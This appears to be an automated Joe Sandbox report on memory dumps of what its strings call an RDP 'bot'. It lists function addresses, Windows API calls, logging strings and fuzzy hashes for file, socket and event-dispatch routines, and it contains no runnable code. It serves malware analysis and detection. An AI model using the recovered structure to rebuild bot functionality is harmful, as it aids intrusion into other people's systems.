Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 0819a08ac9b92502f3effe13010cc7f0f2bae6465a415d33977b83b8dfe9e95d
Instruction ID: 680188718f69fa7894fe5a03c2de82120e45b67a3ee994be2905b43570c8c443
Opcode Fuzzy Hash: 0819a08ac9b92502f3effe13010cc7f0f2bae6465a415d33977b83b8dfe9e95d
Instruction Fuzzy Hash: 36217462A08E8A96E751DF16ED407AA7360BB447A4F544072EE8C476F4DFBCD946CB00

Function 00007FF6EF655B79 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF6EF655C17
GetLastError.KERNEL32 ref: 00007FF6EF655C32

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF6EF655BED
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF6EF655D9E
NULL, xrefs: 00007FF6EF655D75, 00007FF6EF655D81
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF6EF655C50
fs_file_copy, xrefs: 00007FF6EF655BE6, 00007FF6EF655C49, 00007FF6EF655D97

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: d98a879003f8920cd60626ca8283fd755b391b7f9df6f109e05a144c0ec80fb7
Instruction ID: fbc60374954bef494b3db8f2fb75144c4c55df59e6a9d37be70a069a7a6aa2ef
Opcode Fuzzy Hash: d98a879003f8920cd60626ca8283fd755b391b7f9df6f109e05a144c0ec80fb7
Instruction Fuzzy Hash: 1D415F9391C61A87FA244705E41C379676C7F01B8CF540A32D90FE6692EE5EAE81B70F

Function 00007FF6EF6555AD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,?,?,00007FF6EF656311), ref: 00007FF6EF6555C4
GetLastError.KERNEL32 ref: 00007FF6EF65561B

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FF6EF655760
fs_file_delete, xrefs: 00007FF6EF6555FD, 00007FF6EF655629, 00007FF6EF655759
NULL, xrefs: 00007FF6EF65574A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF655604
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF6EF655630

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 0c4f82b62b480a7ccf0ce0eee53dcb185a613733df67b982af0f8108502a8f1c
Instruction ID: 0248b42ff4b6c6f002bf8d1f375997d9d5f5814710e92c07ea01443295e29911
Opcode Fuzzy Hash: 0c4f82b62b480a7ccf0ce0eee53dcb185a613733df67b982af0f8108502a8f1c
Instruction Fuzzy Hash: 3931F867E1C24B83FB205714A4487B8234A5F5179CF650832D91EEB2A2ED1FAD85B30B

Function 00007FFE13382F7D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE13382FCB
WSAGetLastError.WS2_32 ref: 00007FFE13382FDA

Strings

[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE1338301E
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1338303E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13382FED
tcp_recv, xrefs: 00007FFE13383037
tcp_send, xrefs: 00007FFE13382FE6, 00007FFE13383017

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
Instruction ID: a86b31c862eb9b10c6c61a2ab56b3ce1225a5186a3e39c7a96604e201f607202
Opcode Fuzzy Hash: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
Instruction Fuzzy Hash: 4F21CD95A18D028DEA204727A8906BC5642AF347F8F5403F1EC7EA6AF1CE2DE585C308

Function 00007FFE126D1CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE126D1D0B
WSAGetLastError.WS2_32 ref: 00007FFE126D1D1A

Strings

tcp_recv, xrefs: 00007FFE126D1D77
tcp_send, xrefs: 00007FFE126D1D26, 00007FFE126D1D57
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126D1D2D
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE126D1D5E
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE126D1D7E

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: 15b751ea6208828088c8f0ee388e070401a8990f51b1c680e837da1f38e52d34
Instruction ID: 50bedd23927d5e8b04852e787876cb11896491f41d7c2fada0d81f57a77e952b
Opcode Fuzzy Hash: 15b751ea6208828088c8f0ee388e070401a8990f51b1c680e837da1f38e52d34
Instruction Fuzzy Hash: 3F219D51A18D5A82EB208B27AD806B82251BF09BF4F6403F1DCBC4B6F1DEECA9458300

Function 00007FFE13382604 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1338262C
setsockopt.WS2_32 ref: 00007FFE13382658
WSAGetLastError.WS2_32 ref: 00007FFE1338266F
WSAGetLastError.WS2_32 ref: 00007FFE13382694

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE133826AB
tcp_set_timeo, xrefs: 00007FFE1338267F, 00007FFE133826A4
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE13382686

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
Instruction ID: 8f48afe1bfa5f1f553bbda23c0384543a22f3364902f7a8775322e66add4eac3
Opcode Fuzzy Hash: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
Instruction Fuzzy Hash: DD116671A1C9428EE3109F17E800469A661EFA8764F5043B5E97E93BB4DF7CD549CB08

Function 00007FFE0E135624 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E13564C
setsockopt.WS2_32 ref: 00007FFE0E135678
WSAGetLastError.WS2_32 ref: 00007FFE0E13568F
WSAGetLastError.WS2_32 ref: 00007FFE0E1356B4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1356A6
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1356CB
tcp_set_timeo, xrefs: 00007FFE0E13569F, 00007FFE0E1356C4

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 5702d38517544a50c4c02efa5825983acf8dc3702a8c150c31956d51619f44c6
Instruction ID: 240587347c078143e3b7c542f3a497062630bff60808da730e012d75fde6069a
Opcode Fuzzy Hash: 5702d38517544a50c4c02efa5825983acf8dc3702a8c150c31956d51619f44c6
Instruction Fuzzy Hash: 001198F1A0864286F3509B65E4000BA7661EF99B54F104237EAEE837B5DF7CD549CB00

Function 00007FFE126D1344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE126D136C
setsockopt.WS2_32 ref: 00007FFE126D1398
WSAGetLastError.WS2_32 ref: 00007FFE126D13AF
WSAGetLastError.WS2_32 ref: 00007FFE126D13D4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126D13C6
tcp_set_timeo, xrefs: 00007FFE126D13BF, 00007FFE126D13E4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126D13EB

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 4f5fd4287e3ef39b3fcfa2f0e810fdcce5893b80189dde7939da0662194752ee
Instruction ID: 753fc924b9d2803761041cecdcf279a44f6807cb3cd03e2044b26b61d2e99541
Opcode Fuzzy Hash: 4f5fd4287e3ef39b3fcfa2f0e810fdcce5893b80189dde7939da0662194752ee
Instruction Fuzzy Hash: 71113371A0898687FB109B27AC405A96661EF88764F1042B5EA6D83AF4DFFCD5098B04

Function 00007FFE11EC3ED4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC3EFC
setsockopt.WS2_32 ref: 00007FFE11EC3F28
WSAGetLastError.WS2_32 ref: 00007FFE11EC3F3F
WSAGetLastError.WS2_32 ref: 00007FFE11EC3F64

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC3F7B
tcp_set_timeo, xrefs: 00007FFE11EC3F4F, 00007FFE11EC3F74
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC3F56

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 575de45d349c3f6f667e40ae284f2e333394407968df57914051907b86ec02ac
Instruction ID: 1076c58167df66f215bfc679d418a511d38f46f70ef1083de84ae20e25541909
Opcode Fuzzy Hash: 575de45d349c3f6f667e40ae284f2e333394407968df57914051907b86ec02ac
Instruction Fuzzy Hash: 8A11E670A1C98286F7509B9BEC041B7A664FF88764F505271E9AD83BB0DF7CD5098B00

Function 00007FFE0E16ABF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16AC1C
setsockopt.WS2_32 ref: 00007FFE0E16AC48
WSAGetLastError.WS2_32 ref: 00007FFE0E16AC5F
WSAGetLastError.WS2_32 ref: 00007FFE0E16AC84

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E16AC76
tcp_set_timeo, xrefs: 00007FFE0E16AC6F, 00007FFE0E16AC94
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E16AC9B

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 49f31cd4da74999420230ca8a8ff8b08bdaa7f01c0cbf558f8163d08e4928a6f
Instruction ID: 0cc4eccc723d7fa85d4e41b0652a138d726e339d186a9343917bef0694ef82fc
Opcode Fuzzy Hash: 49f31cd4da74999420230ca8a8ff8b08bdaa7f01c0cbf558f8163d08e4928a6f
Instruction Fuzzy Hash: 8E119471A0C5425AE7209B15E8444B9A660FF88B54F504337E9EE83BB5DFBCD54ACB40

Function 00007FFE0EB41CE4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB41D0C
setsockopt.WS2_32 ref: 00007FFE0EB41D38
WSAGetLastError.WS2_32 ref: 00007FFE0EB41D4F
WSAGetLastError.WS2_32 ref: 00007FFE0EB41D74

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB41D8B
tcp_set_timeo, xrefs: 00007FFE0EB41D5F, 00007FFE0EB41D84
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB41D66

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 70116b330ae133e6db921763260f41b65b598ba8a05af3ae692cbf4006f79180
Instruction ID: c1e350207d901aa50374f23931420241089d8899bb61d99f3cf424fc11c5bc9e
Opcode Fuzzy Hash: 70116b330ae133e6db921763260f41b65b598ba8a05af3ae692cbf4006f79180
Instruction Fuzzy Hash: E81163B2B1865286E330AF19E400575A6A0EF88794F105231EAED937F4DF7CD5468F00

Function 00007FFE133833CF Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE13383401
GetProcessHeap.KERNEL32 ref: 00007FFE1338340C
HeapFree.KERNEL32 ref: 00007FFE1338341D
EnterCriticalSection.KERNEL32 ref: 00007FFE13383441
LeaveCriticalSection.KERNEL32 ref: 00007FFE13383464
EnterCriticalSection.KERNEL32 ref: 00007FFE133834D1

Strings

routine_tx, xrefs: 00007FFE133834B7
[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE133834BE

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CriticalSection$EnterHeapLeave$FreeProcess
String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 2539320189-3555278722
Opcode ID: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
Instruction ID: b73aa33aae018fc9f76bc7bb0fea2da36d13da1c794b810ed8ca31a1ddee9118
Opcode Fuzzy Hash: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
Instruction Fuzzy Hash: 09310D35A08E02CAEA259F13E88017D7761EF64BB0F5441B6CA6E67B74CF3CE5858348

Function 00007FFE126DC415 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 127sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FFE126DC448
Sleep.KERNEL32 ref: 00007FFE126DC4C4

Strings

/, xrefs: 00007FFE126DC5A7
routine_rx, xrefs: 00007FFE126DC540, 00007FFE126DC572
[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u), xrefs: 00007FFE126DC547
[W] (%s) -> Not a valid packet received(size=%u,suid=%llx), xrefs: 00007FFE126DC579

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Sleep
String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
API String ID: 3472027048-1600310168
Opcode ID: 7e3ad2c1e4ac073133c4f7497bcf4b2d96363eed15d8fae15b10b4d1402a2ac6
Instruction ID: 0bfbcca630899748d44a4bf54343f08e69aa803b26c9a2b29536f3e0d05de6e9
Opcode Fuzzy Hash: 7e3ad2c1e4ac073133c4f7497bcf4b2d96363eed15d8fae15b10b4d1402a2ac6
Instruction Fuzzy Hash: 0E513A21E1CE4F86FA308B27AC503B96251AF94378F6042B1D8AD466F9DEEDF8458740

Function 00007FFE126D56C7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE126D56D0
GetLastError.KERNEL32 ref: 00007FFE126D5715

Strings

fs_path_exists, xrefs: 00007FFE126D56FB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE126D56ED
(path != NULL), xrefs: 00007FFE126D56F4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D5702

Memory Dump Source

